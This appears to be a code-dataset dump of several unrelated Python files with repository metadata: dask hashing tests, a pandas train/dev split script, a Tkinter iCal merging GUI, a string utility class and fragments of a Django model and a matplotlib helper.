        self.approval.reject(user)
        self.add_status_log(user, DraftRegistrationLog.REJECTED)
        self.approval.save()
    def add_status_log(self, user, action):
        """Persist a DraftRegistrationLog entry for ``action`` by ``user``."""
        log = DraftRegistrationLog(action=action, user=user, draft=self)
        log.save()
    def validate_metadata(self, *args, **kwargs):
        """Validate answers against the schema (delegates to the schema)."""
        return self.registration_schema.validate_metadata(*args, **kwargs)
| true | true |
f725ebb2af351289e10da0b9ff19a8676765fe30 | 2,020 | py | Python | dask/dataframe/tests/test_hashing.py | abhinavralhan/dask | e840ba38eadfa93c3b9959347f0a43c1279a94ab | [
"BSD-3-Clause"
] | 2 | 2018-12-29T13:47:40.000Z | 2018-12-29T13:47:49.000Z | dask/dataframe/tests/test_hashing.py | abhinavralhan/dask | e840ba38eadfa93c3b9959347f0a43c1279a94ab | [
"BSD-3-Clause"
] | 2 | 2019-03-19T22:19:04.000Z | 2019-03-26T19:04:00.000Z | dask/dataframe/tests/test_hashing.py | abhinavralhan/dask | e840ba38eadfa93c3b9959347f0a43c1279a94ab | [
"BSD-3-Clause"
] | 1 | 2021-03-28T04:50:43.000Z | 2021-03-28T04:50:43.000Z | import numpy as np
import pandas as pd
import pandas.util.testing as tm
import pytest
from dask.dataframe.hashing import hash_pandas_object
from dask.dataframe.utils import assert_eq
@pytest.mark.parametrize('obj', [
    pd.Series([1, 2, 3]),
    pd.Series([1.0, 1.5, 3.2]),
    pd.Series([1.0, 1.5, 3.2], index=[1.5, 1.1, 3.3]),
    pd.Series(['a', 'b', 'c']),
    pd.Series([True, False, True]),
    pd.Index([1, 2, 3]),
    pd.Index([True, False, True]),
    pd.DataFrame({'x': ['a', 'b', 'c'], 'y': [1, 2, 3]}),
    pd.util.testing.makeMissingDataframe(),
    pd.util.testing.makeMixedDataFrame(),
    pd.util.testing.makeTimeDataFrame(),
    pd.util.testing.makeTimeSeries(),
    pd.util.testing.makeTimedeltaIndex()])
def test_hash_pandas_object(obj):
    # Hashing the same object twice must be deterministic.
    first = hash_pandas_object(obj)
    second = hash_pandas_object(obj)
    if isinstance(first, np.ndarray):
        np.testing.assert_equal(first, second)
    else:
        assert_eq(first, second)
def test_categorical_consistency():
    """Categoricals must hash by their values, not their codes, regardless of
    the underlying dtype or the category ordering.
    """
    base_series = [
        pd.Series(['a', 'b', 'c', 'd']),
        pd.Series([1000, 2000, 3000, 4000]),
        pd.Series(pd.date_range(0, periods=4)),
    ]
    for plain in base_series:
        as_cat = plain.astype('category').cat.set_categories(plain)
        reordered = as_cat.cat.set_categories(list(reversed(plain)))
        for categorize in (True, False):
            # All three representations must hash identically.
            hashed = [hash_pandas_object(series, categorize=categorize)
                      for series in (plain, as_cat, reordered)]
            tm.assert_series_equal(hashed[0], hashed[1])
            tm.assert_series_equal(hashed[0], hashed[2])
def test_object_missing_values():
    # A missing value at the end must not change how the preceding
    # object-dtype elements are hashed.
    with_missing = pd.Series(['a', 'b', 'c', None])
    full_prefix = hash_pandas_object(with_missing).iloc[:3]
    sliced = hash_pandas_object(with_missing.iloc[:3])
    tm.assert_series_equal(full_prefix, sliced)
| 34.827586 | 79 | 0.637129 | import numpy as np
import pandas as pd
import pandas.util.testing as tm
import pytest
from dask.dataframe.hashing import hash_pandas_object
from dask.dataframe.utils import assert_eq
@pytest.mark.parametrize('obj', [
pd.Series([1, 2, 3]),
pd.Series([1.0, 1.5, 3.2]),
pd.Series([1.0, 1.5, 3.2], index=[1.5, 1.1, 3.3]),
pd.Series(['a', 'b', 'c']),
pd.Series([True, False, True]),
pd.Index([1, 2, 3]),
pd.Index([True, False, True]),
pd.DataFrame({'x': ['a', 'b', 'c'], 'y': [1, 2, 3]}),
pd.util.testing.makeMissingDataframe(),
pd.util.testing.makeMixedDataFrame(),
pd.util.testing.makeTimeDataFrame(),
pd.util.testing.makeTimeSeries(),
pd.util.testing.makeTimedeltaIndex()])
def test_hash_pandas_object(obj):
a = hash_pandas_object(obj)
b = hash_pandas_object(obj)
if isinstance(a, np.ndarray):
np.testing.assert_equal(a, b)
else:
assert_eq(a, b)
def test_categorical_consistency():
for s1 in [pd.Series(['a', 'b', 'c', 'd']),
pd.Series([1000, 2000, 3000, 4000]),
pd.Series(pd.date_range(0, periods=4))]:
s2 = s1.astype('category').cat.set_categories(s1)
s3 = s2.cat.set_categories(list(reversed(s1)))
for categorize in [True, False]:
h1 = hash_pandas_object(s1, categorize=categorize)
h2 = hash_pandas_object(s2, categorize=categorize)
h3 = hash_pandas_object(s3, categorize=categorize)
tm.assert_series_equal(h1, h2)
tm.assert_series_equal(h1, h3)
def test_object_missing_values():
# is hashed.
s = pd.Series(['a', 'b', 'c', None])
h1 = hash_pandas_object(s).iloc[:3]
h2 = hash_pandas_object(s.iloc[:3])
tm.assert_series_equal(h1, h2)
| true | true |
f725ebe4a0002cf0ad0cfd933670021232062f21 | 2,166 | py | Python | dataset_processing.py | alechfho/dog_breed | 2e2f7083c859fdb250f5ba920246b9d2f8168b4d | [
"Apache-2.0"
] | null | null | null | dataset_processing.py | alechfho/dog_breed | 2e2f7083c859fdb250f5ba920246b9d2f8168b4d | [
"Apache-2.0"
] | null | null | null | dataset_processing.py | alechfho/dog_breed | 2e2f7083c859fdb250f5ba920246b9d2f8168b4d | [
"Apache-2.0"
] | null | null | null | import numpy as np
import pandas as pd
def partition_images(df_labels, identifier_label=None, label_postfix='postfix', target_dir='./', filter_identity=None,
                     dev_portion=0.20, encoding_strategy='vgg19_4096'):
    """Split labelled image rows into train/dev CSVs, stratified per label.

    For every kept value of ``identifier_label``, the last
    ``ceil(count * dev_portion)`` rows go to the dev set and the remaining
    rows to the training set.  The two subsets are written to
    ``<target_dir>/labels_train_<label_postfix>.csv`` and
    ``<target_dir>/labels_dev_<label_postfix>.csv``.

    :param df_labels: DataFrame of labels.  NOTE(review): row filtering is
        hard-coded to ``df_labels.breed`` even though grouping uses
        ``identifier_label`` -- confirm these are meant to be the same column.
    :param identifier_label: column name used to stratify the split.
    :param label_postfix: suffix for the output CSV file names.
    :param target_dir: directory the CSV files are written to.
    :param filter_identity: iterable of label values to keep; None or empty
        keeps all values (None replaces the old mutable-default ``[]``).
    :param dev_portion: fraction (rounded up per label) assigned to dev.
    :param encoding_strategy: unused; kept for interface compatibility.
    """
    # Mutable-default fix: treat None (or empty) as "keep every label value".
    if filter_identity is None or np.size(filter_identity) == 0:
        filter_identity = df_labels[identifier_label].unique()
    df_filter_labels = df_labels[df_labels.breed.isin(filter_identity)]
    # Per-label row counts; 'dev_count' is appended as the last column.
    df_filter_identifier_label_count = df_filter_labels.groupby([identifier_label]).agg(['count'])
    df_filter_identifier_label_count['dev_count'] = np.ceil(
        df_filter_identifier_label_count[df_filter_identifier_label_count.columns[0]] * dev_portion).astype(int)
    train_frames = []
    dev_frames = []
    for ident_label, row in df_filter_identifier_label_count.iterrows():
        # .iloc replaces positional-by-label indexing (deprecated in pandas);
        # dev_count is reliably the last column even with extra data columns.
        total = row.iloc[0]
        dev_count = row.iloc[-1]
        train_count = total - dev_count
        df_train, df_dev = filter_images_by_label(df_filter_labels, ident_label, train_count, dev_count)
        train_frames.append(df_train)
        dev_frames.append(df_dev)
    # pd.concat replaces the DataFrame.append API removed in pandas 2.0.
    df_result_train = pd.concat(train_frames) if train_frames else pd.DataFrame()
    df_result_dev = pd.concat(dev_frames) if dev_frames else pd.DataFrame()
    train_label = '{target_dir}/labels_train_{label_postfix}.csv'.format(target_dir=target_dir,
                                                                         label_postfix=label_postfix)
    dev_label = '{target_dir}/labels_dev_{label_postfix}.csv'.format(target_dir=target_dir, label_postfix=label_postfix)
    print('Split into training and dev sets')
    print('Training set in ' + train_label)
    print(df_result_train.groupby([identifier_label]).agg(['count']))
    print('Dev set in ' + dev_label)
    print(df_result_dev.groupby([identifier_label]).agg(['count']))
    df_result_train.to_csv(train_label, index=False)
    df_result_dev.to_csv(dev_label, index=False)
    return
def filter_images_by_label(df_labels, label, train_count, dev_count):
    """Return (train, dev) row subsets for one label value.

    Rows whose ``breed`` equals ``label`` are split positionally: the first
    ``train_count`` rows become the training subset and the last
    ``dev_count`` rows the dev subset.
    """
    matching = df_labels[df_labels.breed.isin([label])]
    train_part = matching.head(train_count)
    dev_part = matching.tail(dev_count)
    return train_part, dev_part
| 47.086957 | 120 | 0.72807 | import numpy as np
import pandas as pd
def partition_images(df_labels, identifier_label=None, label_postfix='postfix', target_dir='./', filter_identity=[],
dev_portion=0.20, encoding_strategy='vgg19_4096'):
if np.size(filter_identity) == 0:
filter_identity = df_labels[identifier_label].unique()
df_filter_labels = df_labels[df_labels.breed.isin(filter_identity)]
df_filter_identifier_label_count = df_filter_labels.groupby([identifier_label]).agg(['count'])
df_filter_identifier_label_count['dev_count'] = np.ceil(
df_filter_identifier_label_count[df_filter_identifier_label_count.columns[0]] * dev_portion).astype(int)
df_result_train = pd.DataFrame()
df_result_dev = pd.DataFrame()
for ident_label, row in df_filter_identifier_label_count.iterrows():
total = row[0]
dev_count = row[1]
train_count = total - dev_count
df_train, df_dev = filter_images_by_label(df_filter_labels, ident_label, train_count, dev_count)
df_result_train = df_result_train.append(df_train)
df_result_dev = df_result_dev.append(df_dev)
train_label = '{target_dir}/labels_train_{label_postfix}.csv'.format(target_dir=target_dir,
label_postfix=label_postfix)
dev_label = '{target_dir}/labels_dev_{label_postfix}.csv'.format(target_dir=target_dir, label_postfix=label_postfix)
print('Split into training and dev sets')
print('Training set in ' + train_label)
print(df_result_train.groupby([identifier_label]).agg(['count']))
print('Dev set in ' + dev_label)
print(df_result_dev.groupby([identifier_label]).agg(['count']))
df_result_train.to_csv(train_label, index=False)
df_result_dev.to_csv(dev_label, index=False)
return
def filter_images_by_label(df_labels, label, train_count, dev_count):
df_selected_label = df_labels[df_labels.breed.isin([label])]
df_selected_label_train = df_selected_label.head(train_count)
df_selected_label_vaidation = df_selected_label.tail(dev_count)
return df_selected_label_train, df_selected_label_vaidation
| true | true |
f725ec3baf077b8402ef54fa4ab3be9010a6ff8a | 6,686 | py | Python | ical_fusion.py | octogene/icalfusion | 3c00762d7d9353ed65109deef001cb7ba94051d1 | [
"MIT"
] | null | null | null | ical_fusion.py | octogene/icalfusion | 3c00762d7d9353ed65109deef001cb7ba94051d1 | [
"MIT"
] | null | null | null | ical_fusion.py | octogene/icalfusion | 3c00762d7d9353ed65109deef001cb7ba94051d1 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2017 Bogdan Cordier
#
# Distributed under terms of the MIT license.
import datetime
from icalendar import Calendar
from pytz import timezone
from dateutil.parser import parse
from tkinter import Tk, filedialog, Listbox, Button, Entry, StringVar, \
LabelFrame, BooleanVar, Frame, ttk, END, Checkbutton, messagebox
local_timezone = timezone('Europe/Paris')
ical_fields = ('SUMMARY', 'UID', 'LOCATION', 'CATEGORIES', 'DTSTART', 'DTEND')
class GUI:
    """Tkinter front end for merging several iCalendar (.ics) files into one.

    The user picks files, may filter events on a single field, may drop
    duplicate events by a chosen field, and saves the merged calendar.
    """

    def __init__(self):
        self.root = Tk()
        self.root.title('ICal Fusion')
        self.root.iconbitmap('@icon.xbm')
        self.create_filter_frame()
        self.files = []
        self.create_files_list_frame()
        self.create_duplicates_frame()
        self.btn_frame = Frame(self.root)
        self.create_button_frame()
        self.calendar = Calendar()
        self.root.mainloop()

    def create_filter_frame(self):
        """Build the field / condition / value filter row."""
        filter_frame = LabelFrame(self.root, text='Filter')
        self.filter_type = ttk.Combobox(filter_frame, values=ical_fields)
        self.filter_type.current(0)
        self.filter_type.bind("<<ComboboxSelected>>", self.update_filter_cond)
        self.filter_type.state(('!disabled', 'readonly'))
        self.filter_type.grid(row=0)
        self.filter_cond = ttk.Combobox(filter_frame,
                                        values=('CONTAINS',
                                                'EQUAL TO'))
        self.filter_cond.current(0)
        self.filter_cond.state(('!disabled', 'readonly'))
        self.filter_cond.grid(row=0, column=1)
        self.filter_value = StringVar()
        self.filter_entry = Entry(filter_frame,
                                  textvariable=self.filter_value,
                                  width=25,
                                  bg='white')
        self.filter_entry.grid(row=0, column=2)
        filter_frame.pack(fill='x', side='top')

    def update_filter_cond(self, *args):
        """Update filter conditions on filter type selection."""
        if self.filter_type.get() in ('DTSTART', 'DTEND'):
            self.filter_cond['values'] = ('BEFORE', 'AFTER')
        else:
            self.filter_cond['values'] = ('CONTAINS', 'EQUAL TO')
        self.filter_cond.current(0)

    def create_files_list_frame(self):
        """Build the listbox showing the files queued for merging."""
        files_list_frame = LabelFrame(self.root, text='Files to merge')
        self.FilesList = Listbox(files_list_frame)
        self.FilesList.pack(side='left', fill='both', expand=1)
        files_list_frame.pack(fill='x')

    def create_duplicates_frame(self):
        """Build the 'remove duplicates by <field>' checkbox row."""
        frame = Frame(self.root)
        self.duplicates_check = BooleanVar()
        self.duplicates_filter = ttk.Combobox(frame, value=ical_fields)
        self.duplicates_filter.current(0)
        self.duplicates_filter.state(('!disabled', 'readonly'))
        self.duplicates_filter.pack(side='right')
        self.duplicates_cbox = Checkbutton(frame,
                                           variable=self.duplicates_check,
                                           text='Remove duplicates by')
        self.duplicates_cbox.pack(side='right')
        frame.pack(fill='x')

    def create_button_frame(self):
        """Build the Add / Merge button row."""
        Button(self.btn_frame, text='Add...',
               command=self.add_files).grid(row=0, column=0)
        Button(self.btn_frame, text='Merge',
               command=self.join_files).grid(row=0, column=1)
        self.btn_frame.pack(side='bottom')

    def add_files(self):
        """Ask the user for .ics files and append them to the list."""
        files = filedialog.askopenfilenames(title="Load ICal files",
                                            filetypes=[('ICal files', '.ics'),
                                                       ('all files', '.*')])
        for file in files:
            self.FilesList.insert(END, file)

    def filter(self, event):
        """Check if the configured filter condition is met for an event.

        :param event: icalendar VEVENT component to test.
        :return: True if the event matches, False otherwise.
        """
        value = self.filter_value.get()
        field = self.filter_type.get()
        condition = self.filter_cond.get()
        if field in ('DTSTART', 'DTEND'):
            try:
                value = parse(value)
            except ValueError:
                messagebox.showerror('Wrong value',
                                     'Value is not recognized as a date')
                # Bug fix: the original fell through and tried to normalize
                # the unparsed string, which raised; treat it as a non-match.
                return False
            value = self.normalize_date(value)
        if condition == 'CONTAINS':
            if value in event.get(field):
                return True
        if condition == 'EQUAL TO':
            if value == event.get(field):
                return True
        if condition == 'BEFORE':
            if value > self.normalize_date(event.get(field).dt):
                return True
        if condition == 'AFTER':
            if value < self.normalize_date(event.get(field).dt):
                return True
        return False

    def normalize_date(self, date):
        """Ensure that date is a datetime object and is offset aware."""
        if not isinstance(date, datetime.datetime):
            date = datetime.datetime(date.year, date.month, date.day)
        if date.tzinfo is None or date.tzinfo.utcoffset(date) is None:
            date = local_timezone.localize(date)
        return date

    def join_files(self):
        """Merge all listed files into one calendar and write it to disk."""
        if self.FilesList.get(0, END):
            ical = filedialog.asksaveasfilename(title='Save as...')
            self.checked_values = set()
            for file in self.FilesList.get(0, END):
                # 'with' guarantees the input file is closed even on error.
                with open(file, 'r') as ics:
                    cal = Calendar.from_ical(ics.read())
                events = (co for co in cal.walk() if co.name == 'VEVENT')
                for event in events:
                    if self.duplicates_check.get():
                        field = self.duplicates_filter.get()
                        value = event.get(field)
                        if value in self.checked_values:
                            # Bug fix: 'break' skipped every remaining event
                            # of the file; only this duplicate is skipped.
                            continue
                        self.checked_values.add(value)
                    # Bug fix: the original tested the StringVar object
                    # itself (always truthy) and its dead else-branch called
                    # Checkbutton.getboolean() with no argument.  Apply the
                    # filter only when the user actually entered a value.
                    if self.filter_value.get():
                        if self.filter(event):
                            self.calendar.add_component(event)
                    else:
                        self.calendar.add_component(event)
            with open(ical, 'wb') as f:
                f.write(self.calendar.to_ical())
            messagebox.showinfo('Success', 'Files were successfully joined !')
        else:
            messagebox.showerror('No files', 'Please add files to merge...')
if __name__ == '__main__':
    # Launch the ICal Fusion GUI when run as a script.
    GUI()
| 36.939227 | 78 | 0.551152 |
import datetime
from icalendar import Calendar
from pytz import timezone
from dateutil.parser import parse
from tkinter import Tk, filedialog, Listbox, Button, Entry, StringVar, \
LabelFrame, BooleanVar, Frame, ttk, END, Checkbutton, messagebox
local_timezone = timezone('Europe/Paris')
ical_fields = ('SUMMARY', 'UID', 'LOCATION', 'CATEGORIES', 'DTSTART', 'DTEND')
class GUI:
def __init__(self):
self.root = Tk()
self.root.title('ICal Fusion')
self.root.iconbitmap('@icon.xbm')
self.create_filter_frame()
self.files = []
self.create_files_list_frame()
self.create_duplicates_frame()
self.btn_frame = Frame(self.root)
self.create_button_frame()
self.calendar = Calendar()
self.root.mainloop()
def create_filter_frame(self):
filter_frame = LabelFrame(self.root, text='Filter')
self.filter_type = ttk.Combobox(filter_frame, values=ical_fields)
self.filter_type.current(0)
self.filter_type.bind("<<ComboboxSelected>>", self.update_filter_cond)
self.filter_type.state(('!disabled', 'readonly'))
self.filter_type.grid(row=0)
self.filter_cond = ttk.Combobox(filter_frame,
values=('CONTAINS',
'EQUAL TO'))
self.filter_cond.current(0)
self.filter_cond.state(('!disabled', 'readonly'))
self.filter_cond.grid(row=0, column=1)
self.filter_value = StringVar()
self.filter_entry = Entry(filter_frame,
textvariable=self.filter_value,
width=25,
bg='white')
self.filter_entry.grid(row=0, column=2)
filter_frame.pack(fill='x', side='top')
def update_filter_cond(self, *args):
if self.filter_type.get() in ('DTSTART', 'DTEND'):
self.filter_cond['values'] = ('BEFORE', 'AFTER')
else:
self.filter_cond['values'] = ('CONTAINS', 'EQUAL TO')
self.filter_cond.current(0)
def create_files_list_frame(self):
files_list_frame = LabelFrame(self.root, text='Files to merge')
self.FilesList = Listbox(files_list_frame)
self.FilesList.pack(side='left', fill='both', expand=1)
files_list_frame.pack(fill='x')
def create_duplicates_frame(self):
frame = Frame(self.root)
self.duplicates_check = BooleanVar()
self.duplicates_filter = ttk.Combobox(frame, value=ical_fields)
self.duplicates_filter.current(0)
self.duplicates_filter.state(('!disabled', 'readonly'))
self.duplicates_filter.pack(side='right')
self.duplicates_cbox = Checkbutton(frame,
variable=self.duplicates_check,
text='Remove duplicates by')
self.duplicates_cbox.pack(side='right')
frame.pack(fill='x')
def create_button_frame(self):
Button(self.btn_frame, text='Add...',
command=self.add_files).grid(row=0, column=0)
Button(self.btn_frame, text='Merge',
command=self.join_files).grid(row=0, column=1)
self.btn_frame.pack(side='bottom')
def add_files(self):
files = filedialog.askopenfilenames(title="Load ICal files",
filetypes=[('ICal files', '.ics'),
('all files', '.*')])
for file in files:
self.FilesList.insert(END, file)
def filter(self, event):
value = self.filter_value.get()
field = self.filter_type.get()
condition = self.filter_cond.get()
if field in ('DTSTART', 'DTEND'):
try:
value = parse(value)
except ValueError:
messagebox.showerror('Wrong value',
'Value is not recognized as a date')
value = self.normalize_date(value)
if condition == 'CONTAINS':
if value in event.get(field):
return True
if condition == 'EQUAL TO':
if value == event.get(field):
return True
if condition == 'BEFORE':
if value > self.normalize_date(event.get(field).dt):
return True
if condition == 'AFTER':
if value < self.normalize_date(event.get(field).dt):
return True
return False
def normalize_date(self, date):
if not isinstance(date, datetime.datetime):
date = datetime.datetime(date.year, date.month, date.day)
if date.tzinfo is None or date.tzinfo.utcoffset(date) is None:
date = local_timezone.localize(date)
return date
def join_files(self):
if self.FilesList.get(0, END):
ical = filedialog.asksaveasfilename(title='Save as...')
self.checked_values = set()
for file in self.FilesList.get(0, END):
ics = open(file, 'r')
cal = Calendar.from_ical(ics.read())
ics.close()
events = (co for co in cal.walk() if co.name == 'VEVENT')
for event in events:
if self.duplicates_check.get():
field = self.duplicates_filter.get()
value = event.get(field)
if value in self.checked_values:
break
else:
self.checked_values.add(value)
if self.filter_value:
if self.filter(event):
self.calendar.add_component(event)
else:
if self.duplicates_cbox.getboolean():
pass
else:
self.calendar.add_component(event)
with open(ical, 'wb') as f:
f.write(self.calendar.to_ical())
messagebox.showinfo('Success', 'Files were successfully joined !')
else:
messagebox.showerror('No files', 'Please add files to merge...')
if __name__ == '__main__':
GUI()
| true | true |
f725ecc93cfb05f785f6599c6384eea2e2c02e46 | 7,910 | py | Python | utilbox/string_utils/string_utils.py | jensonjose/utilbox | f47ac1c97fdd3f7caf8ea1c6b693ea115076f0e8 | [
"MIT"
] | 1 | 2017-07-08T17:59:09.000Z | 2017-07-08T17:59:09.000Z | utilbox/string_utils/string_utils.py | jensonjose/utilbox | f47ac1c97fdd3f7caf8ea1c6b693ea115076f0e8 | [
"MIT"
] | 1 | 2017-08-12T13:51:37.000Z | 2017-08-12T13:51:37.000Z | utilbox/string_utils/string_utils.py | jensonjose/utilbox | f47ac1c97fdd3f7caf8ea1c6b693ea115076f0e8 | [
"MIT"
] | 1 | 2018-10-27T06:13:22.000Z | 2018-10-27T06:13:22.000Z | """
Utility module to manipulate strings.
"""
import re
import types
__author__ = "Jenson Jose"
__email__ = "jensonjose@live.in"
__status__ = "Alpha"
class StringUtils:
    """
    Utility class containing static methods for manipulation of strings.

    Line-oriented helpers treat the input as "\\n"-separated text and return
    the updated text joined with "\\n" again (or False when nothing remains,
    matching the historical contract of join_list_elements).
    """

    def __init__(self):
        pass

    @staticmethod
    def is_blank(string):
        """
        Checks if supplied string is blank (empty or whitespace only).

        :param string: The string to be verified.
        :return: True if string is blank, False otherwise.
        :rtype: bool
        """
        return not string.strip()

    @staticmethod
    def join_list_elements(string_list, join_char=""):
        """
        Joins list elements into a single string, using the joining character.

        :param string_list: The list of strings to be joined.
        :param join_char: The character to use for joining the strings.
        :return: The joined string if string_list is a non-empty list,
                 False otherwise (kept for backward compatibility).
        :rtype: str | bool
        """
        # Bug fix: 'types.ListType' exists only on Python 2; use the built-in
        # 'list' type so this also works on Python 3.
        if isinstance(string_list, list) and len(string_list) > 0:
            return str(join_char).join(string_list)
        return False

    @staticmethod
    def remove_lines(text, line_count):
        """
        Removes the given number of lines from the beginning or end of text.

        :param text: Text from which lines are to be removed.
        :param line_count: Number of lines to remove; a positive value removes
                           from the beginning, a negative value from the end.
        :return: The updated text, or False if every line was removed.
        :rtype: str | bool
        """
        text_lines = text.split("\n")
        # Bug fix: the original removed elements by index while the list was
        # shrinking (dropping the wrong lines), and its negative branch
        # iterated an empty range and removed nothing.  Slicing handles both
        # directions correctly.
        if line_count > 0:
            text_lines = text_lines[line_count:]
        elif line_count < 0:
            text_lines = text_lines[:line_count]
        return StringUtils.join_list_elements(text_lines, "\n")

    @staticmethod
    def remove_lines_range(text, start_line_number, end_line_number):
        """
        Removes a range of lines (0-based, end exclusive) from the text.

        :param text: Text from which lines are to be removed.
        :param start_line_number: Index of the first line to remove.
        :param end_line_number: Index one past the last line to remove.
        :return: The updated text, or False if every line was removed.
        :rtype: str | bool
        """
        text_lines = text.split("\n")
        # Bug fix: deleting a slice avoids the index shifting of repeated
        # list.remove() calls, which previously removed the wrong lines.
        del text_lines[start_line_number:end_line_number]
        return StringUtils.join_list_elements(text_lines, "\n")

    @staticmethod
    def remove_lines_list(text, line_list):
        """
        Removes the lines at the given (0-based) indices from the text.

        :param text: Text from which lines are to be removed.
        :param line_list: Indices of the lines to remove.
        :return: The updated text, or False if every line was removed.
        :rtype: str | bool
        """
        text_lines = text.split("\n")
        drop = set(line_list)
        # Rebuild rather than remove in place so earlier removals do not
        # shift the indices of later ones.
        kept = [line for index, line in enumerate(text_lines) if index not in drop]
        return StringUtils.join_list_elements(kept, "\n")

    @staticmethod
    def remove_leading_blanks(string):
        """
        Removes leading blank lines from the supplied string.

        :param string: String from which leading blank lines are removed.
        :return: The updated string, or False if every line was blank.
        :rtype: str | bool
        """
        text_lines = string.split("\n")
        # Bug fix: the original mutated the list while iterating it, which
        # skips elements; locate the first non-blank line instead.
        start = 0
        while start < len(text_lines) and StringUtils.is_blank(text_lines[start]):
            start += 1
        return StringUtils.join_list_elements(text_lines[start:], "\n")

    @staticmethod
    def remove_trailing_blanks(string):
        """
        Removes trailing blank lines from the supplied string.

        :param string: String from which trailing blank lines are removed.
        :return: The updated string, or False if every line was blank.
        :rtype: str | bool
        """
        text_lines = string.split("\n")
        # Scan back from the end to the last non-blank line.
        end = len(text_lines)
        while end > 0 and StringUtils.is_blank(text_lines[end - 1]):
            end -= 1
        return StringUtils.join_list_elements(text_lines[:end], "\n")

    @staticmethod
    def extract_line(text, line_number):
        """
        Extracts the specified (1-based) line from the supplied text.

        :param text: Text from which the line is to be extracted.
        :param line_number: 1-based number of the line to extract.
        :return: The extracted line.
        :rtype: str
        """
        text_lines = text.split("\n")
        if len(text_lines) > 0:
            return text_lines[line_number - 1]
        return False

    @staticmethod
    def get_line_number(text, string):
        """
        Determines the 1-based line number of the first occurrence of the
        given string within the text.

        A case-insensitive exact match is tried first; failing that, the
        string is treated as a regular expression.

        :param text: Text in which 'string' is to be searched.
        :param string: Data (or regex) to locate within the text.
        :return: The line number, or False if no line matches.
        :rtype: int | bool
        """
        text_lines = text.split("\n")
        for line_ctr, text_line in enumerate(text_lines, start=1):
            if StringUtils.equals_ignore_case(text_line, string):
                return line_ctr
        for line_ctr, text_line in enumerate(text_lines, start=1):
            if StringUtils.check_pattern(text_line, string):
                return line_ctr
        return False

    @staticmethod
    def check_pattern(text, pattern):
        """
        Looks for the supplied regex pattern in the given text.

        :param text: Text in which 'pattern' is to be searched.
        :param pattern: Pattern expression to locate within the text.
        :return: True if a match was found, False otherwise.
        :rtype: bool
        """
        return len(re.findall(pattern, text)) > 0

    @staticmethod
    def equals_ignore_case(string1, string2):
        """
        Compares 2 given strings for equality regardless of case.

        :return: True if matching, False otherwise.
        :rtype: bool
        """
        return string1.lower() == string2.lower()

    @staticmethod
    def equals_match_case(string1, string2):
        """
        Compares 2 given strings for exact equality.

        :return: True if matching, False otherwise.
        :rtype: bool
        """
        return string1 == string2
| 27.465278 | 110 | 0.594817 |
import re
import types
__author__ = "Jenson Jose"
__email__ = "jensonjose@live.in"
__status__ = "Alpha"
class StringUtils:
    """Static helpers for line-oriented text manipulation."""

    def __init__(self):
        pass

    @staticmethod
    def is_blank(string):
        """Return True if the string is empty or whitespace-only."""
        if string.strip():
            return False
        return True

    @staticmethod
    def join_list_elements(string_list, join_char=""):
        """Join a non-empty list of strings with join_char; return False otherwise."""
        # isinstance(..., list): the old types.ListType is Python 2 only and
        # raises AttributeError on Python 3.
        if isinstance(string_list, list):
            if len(string_list) > 0:
                return str(join_char).join(string_list)
        return False

    @staticmethod
    def remove_lines(text, line_count):
        """Remove |line_count| lines from the start (positive) or end (negative)."""
        text_lines = text.split("\n")
        if len(text_lines) > 0:
            if line_count > 0:
                # Deleting a slice avoids the index shifting caused by
                # removing elements one at a time.
                del text_lines[:line_count]
            elif line_count < 0:
                # The previous range(0, negative) loop never executed, so
                # negative counts silently did nothing; remove from the end.
                del text_lines[line_count:]
        updated_text = StringUtils.join_list_elements(text_lines, "\n")
        return updated_text

    @staticmethod
    def remove_lines_range(text, start_line_number, end_line_number):
        """Remove the lines with 0-based indices in [start, end)."""
        text_lines = text.split("\n")
        if len(text_lines) > 0:
            # A slice delete removes the intended range; the previous
            # remove-by-value loop deleted the wrong lines once indices shifted.
            del text_lines[start_line_number:end_line_number]
        updated_text = StringUtils.join_list_elements(text_lines, "\n")
        return updated_text

    @staticmethod
    def remove_lines_list(text, line_list):
        """Remove the lines at the given 0-based indices."""
        text_lines = text.split("\n")
        if len(text_lines) > 0:
            # Descending order keeps the remaining indices valid after each delete.
            for line_index in sorted(set(line_list), reverse=True):
                del text_lines[line_index]
        updated_text = StringUtils.join_list_elements(text_lines, "\n")
        return updated_text

    @staticmethod
    def remove_leading_blanks(string):
        """Remove blank lines from the start of the string."""
        text_lines = string.split("\n")
        # Popping from the front is safe; iterating while calling remove()
        # skipped every other blank line.
        while text_lines and StringUtils.is_blank(text_lines[0]):
            del text_lines[0]
        updated_string = StringUtils.join_list_elements(text_lines, "\n")
        return updated_string

    @staticmethod
    def remove_trailing_blanks(string):
        """Remove blank lines from the end of the string."""
        text_lines = string.split("\n")
        while text_lines and StringUtils.is_blank(text_lines[-1]):
            del text_lines[-1]
        updated_string = StringUtils.join_list_elements(text_lines, "\n")
        return updated_string

    @staticmethod
    def extract_line(text, line_number):
        """Return the line at the given 1-based line number, or False if no lines."""
        text_lines = text.split("\n")
        if len(text_lines) > 0:
            return text_lines[line_number - 1]
        return False

    @staticmethod
    def get_line_number(text, string):
        """Return the 1-based number of the first line matching 'string'.

        Exact (case-insensitive) matches are preferred; failing that, 'string'
        is treated as a regex. Returns False when nothing matches.
        """
        text_lines = text.split("\n")
        line_ctr = 1
        for text_line in text_lines:
            if StringUtils.equals_ignore_case(text_line, string):
                return line_ctr
            line_ctr += 1
        line_ctr = 1
        for text_line in text_lines:
            if StringUtils.check_pattern(text_line, string):
                return line_ctr
            line_ctr += 1
        return False

    @staticmethod
    def check_pattern(text, pattern):
        """Return True if the regex 'pattern' matches anywhere in 'text'."""
        return re.search(pattern, text) is not None

    @staticmethod
    def equals_ignore_case(string1, string2):
        """Case-insensitive string equality."""
        return string1.lower() == string2.lower()

    @staticmethod
    def equals_match_case(string1, string2):
        """Case-sensitive string equality."""
        return string1 == string2
| true | true |
f725eecf105d6cb129a87a1af62fe37c37cb459b | 2,613 | py | Python | heppyplot/plot_helpers.py | ebothmann/heppyplot | dab969879391f70a91c34f71482a9691b9c80141 | [
"MIT"
] | null | null | null | heppyplot/plot_helpers.py | ebothmann/heppyplot | dab969879391f70a91c34f71482a9691b9c80141 | [
"MIT"
] | null | null | null | heppyplot/plot_helpers.py | ebothmann/heppyplot | dab969879391f70a91c34f71482a9691b9c80141 | [
"MIT"
] | null | null | null | import math
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.transforms as mtransforms
from mpl_toolkits.axes_grid.anchored_artists import AnchoredText
def setup_axes(diff=False):
